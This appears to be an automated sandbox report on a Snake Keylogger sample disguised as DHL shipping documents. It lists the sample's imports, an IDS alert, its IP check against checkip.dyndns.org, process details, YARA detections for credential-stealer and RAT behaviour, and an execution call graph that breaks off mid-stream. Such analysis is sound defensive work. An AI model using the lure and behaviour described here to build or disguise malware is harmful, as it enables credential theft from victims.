                      ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                      SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                      ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                      COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                      USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                      GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                      KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                      Language of compilation system | Country where language is spoken
                      English | United States
                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                      02/07/23-18:24:17.350492 | TCP | 2039190 | ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check | 49700 | 80 | 192.168.2.3 | 193.122.6.168
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Feb 7, 2023 18:24:17.331041098 CET | 49700 | 80 | 192.168.2.3 | 193.122.6.168
                      Feb 7, 2023 18:24:17.349941015 CET | 80 | 49700 | 193.122.6.168 | 192.168.2.3
                      Feb 7, 2023 18:24:17.350086927 CET | 49700 | 80 | 192.168.2.3 | 193.122.6.168
                      Feb 7, 2023 18:24:17.350492001 CET | 49700 | 80 | 192.168.2.3 | 193.122.6.168
                      Feb 7, 2023 18:24:17.368350029 CET | 80 | 49700 | 193.122.6.168 | 192.168.2.3
                      Feb 7, 2023 18:24:17.370917082 CET | 80 | 49700 | 193.122.6.168 | 192.168.2.3
                      Feb 7, 2023 18:24:17.425228119 CET | 49700 | 80 | 192.168.2.3 | 193.122.6.168
                      Feb 7, 2023 18:25:22.371258020 CET | 80 | 49700 | 193.122.6.168 | 192.168.2.3
                      Feb 7, 2023 18:25:22.371350050 CET | 49700 | 80 | 192.168.2.3 | 193.122.6.168
                      Feb 7, 2023 18:25:57.387985945 CET | 49700 | 80 | 192.168.2.3 | 193.122.6.168
                      Feb 7, 2023 18:25:57.405881882 CET | 80 | 49700 | 193.122.6.168 | 192.168.2.3
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Feb 7, 2023 18:24:17.263358116 CET | 58921 | 53 | 192.168.2.3 | 8.8.8.8
                      Feb 7, 2023 18:24:17.284573078 CET | 53 | 58921 | 8.8.8.8 | 192.168.2.3
                      Feb 7, 2023 18:24:17.299715996 CET | 62704 | 53 | 192.168.2.3 | 8.8.8.8
                      Feb 7, 2023 18:24:17.320004940 CET | 53 | 62704 | 8.8.8.8 | 192.168.2.3
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Feb 7, 2023 18:24:17.263358116 CET | 192.168.2.3 | 8.8.8.8 | 0x6390 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.299715996 CET | 192.168.2.3 | 8.8.8.8 | 0x6153 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Feb 7, 2023 18:24:17.284573078 CET | 8.8.8.8 | 192.168.2.3 | 0x6390 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.284573078 CET | 8.8.8.8 | 192.168.2.3 | 0x6390 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.284573078 CET | 8.8.8.8 | 192.168.2.3 | 0x6390 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.284573078 CET | 8.8.8.8 | 192.168.2.3 | 0x6390 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.284573078 CET | 8.8.8.8 | 192.168.2.3 | 0x6390 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.284573078 CET | 8.8.8.8 | 192.168.2.3 | 0x6390 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.320004940 CET | 8.8.8.8 | 192.168.2.3 | 0x6153 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.320004940 CET | 8.8.8.8 | 192.168.2.3 | 0x6153 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.320004940 CET | 8.8.8.8 | 192.168.2.3 | 0x6153 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.320004940 CET | 8.8.8.8 | 192.168.2.3 | 0x6153 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.320004940 CET | 8.8.8.8 | 192.168.2.3 | 0x6153 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                      Feb 7, 2023 18:24:17.320004940 CET | 8.8.8.8 | 192.168.2.3 | 0x6153 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                      • checkip.dyndns.org
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.3 | 49700 | 193.122.6.168 | 80 | C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Feb 7, 2023 18:24:17.350492001 CET | 102 | OUT | GET / HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                      Host: checkip.dyndns.org
                      Connection: Keep-Alive
                      Feb 7, 2023 18:24:17.370917082 CET | 102 | IN | HTTP/1.1 200 OK
                      Date: Tue, 07 Feb 2023 17:24:17 GMT
                      Content-Type: text/html
                      Content-Length: 103
                      Connection: keep-alive
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.13</body></html>



                      Target ID:0
                      Start time:18:24:09
                      Start date:07/02/2023
                      Path:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      Imagebase:0x400000
                      File size:459101 bytes
                      MD5 hash:CF98F42B9D4BBDC20E54E7E0CA7543C0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Target ID:1
                      Start time:18:24:10
                      Start date:07/02/2023
                      Path:C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m
                      Imagebase:0x1060000
                      File size:133120 bytes
                      MD5 hash:377552A9A2C84B8C55314176A566C079
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 23%, ReversingLabs
                      • Detection: 13%, Virustotal
                      Reputation:low

                      Target ID:2
                      Start time:18:24:11
                      Start date:07/02/2023
                      Path:C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                      Imagebase:0x1060000
                      File size:133120 bytes
                      MD5 hash:377552A9A2C84B8C55314176A566C079
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                      Reputation:low

                      Target ID:12
                      Start time:18:25:30
                      Start date:07/02/2023
                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Imagebase:0x7ff618830000
                      File size:455656 bytes
                      MD5 hash:A267555174BFA53844371226F482B86B
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:13
                      Start time:18:25:30
                      Start date:07/02/2023
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff745070000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                        Execution Graph

                        Execution Coverage:15.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.4%
                        Total number of Nodes:1385
                        Total number of Limit Nodes:25
API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 
4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 
4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 
40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 
4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 
